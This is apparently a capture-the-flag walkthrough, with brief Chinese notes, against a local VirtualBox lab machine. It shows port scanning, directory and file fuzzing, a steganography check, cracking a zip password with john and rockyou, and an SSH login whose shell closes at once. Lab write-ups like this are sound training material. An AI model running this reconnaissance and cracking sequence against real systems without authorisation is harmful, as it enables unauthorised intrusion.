Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-16 00:20 EDT Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 51.32% done; ETC: 00:20 (0:00:03 remaining) Nmap scan report for 192.168.0.154 Host is up (0.00054s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 9e:41:5a:43:d8:b3:31:18:0f:2e:32:36:cf:68:c4:b7 (RSA) | 256 6f:24:81:b4:3d:e5:b9:c8:47:bf:b2:8b:bf:41:2d:51 (ECDSA) |_ 256 49:5f:c0:7a:42:20:76:76:d5:29:1a:65:bf:87:d2:24 (ED25519) 53/tcp filtered domain 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-title: Site doesn't have a title (text/html). |_http-server-header: Apache/2.4.38 (Debian) MAC Address: 08:00:27:8C:77:0A (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.54 ms 192.168.0.154 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds
80 开着 ,去看看发现一片空白,查看源码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
<html> <head> <metahttp-equiv="content-type"content="text/html; charset=windows-1252" /> </head> <body> <p> <img src="index_fichiers/nietzsche.jpg" alt="" style="display: block; margin-left: auto; margin-right: auto;" > </p> <!-- If your eye was sharper, you would see everything in motion, lol --> </body> </html>
gobuster dir -u http://192.168.0.154/index_fichiers/ -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,7z,zip,pdf
路径没有收获,那么就下载下来图片,看看有没有啥隐写之类的:
1 2 3 4 5 6 7 8 9
curl -o nietzsche.jpg http://192.168.0.154/nietzsche.jpg └─# steghide info nietzsche.jpg "nietzsche.jpg": format: jpeg capacity: 1.2 KB Try to get information about embedded data ? (y/n) y Enter passphrase: steghide: could not extract any data with that passphrase!
salome doesn't want me, I'm so sad... i'm sure god is dead... I drank 6 liters of Paulaner.... too drunk lol. I'll write her a poem and she'll desire me. I'll name it salome_and_?? I don't know.
I must not forget to save it and put a good extension because I don't have much storage.
└─# wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -z file,/root/zip.txt --sc 200 http://192.168.0.154/salome_and_FUZZ.FUZ2Z ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ********************************************************
Target: http://192.168.0.154/salome_and_FUZZ.FUZ2Z Total requests: 168492
===================================================================== ID Response Lines Word Chars Payload =====================================================================
000004600: 200 0 L 20 W 436 Ch "me - zip" 000005637: 404 9 L 31 W 275 Ch "current - 7z" ^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending
curl -o salome_and_me.zip http://192.168.0.154/salome_and_me.zip % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 452 100 452 0 0 200k 0 --:--:-- --:--:-- --:--:-- 220k
zip2john salome_and_me.zip > zip.hash └─# john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status turtle (salome_and_me.zip/salome_and_me.txt) 1g 0:00:00:00 DONE (2025-08-16 01:29) 50.00g/s 409600p/s 409600c/s 409600C/s 123456..whitetiger Use the "--show" option to display all of the cracked passwords reliably Session completed.
My name is fred, And tonight I'm sad, lonely and scared, Because my love Salome prefers schopenhauer, asshole, I hate him he's stupid, ugly and a peephole, My darling I offered you a great switch, And now you reject my love, bitch I don't give a fuck, I'll go with another lady, And she'll call me BABY!
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sat Aug 16 01:36:17 2025 from 192.168.0.30 fred@superhuman:~$ fred@superhuman:~$ fred@superhuman:~$ ls lol Connection to 192.168.0.154 closed.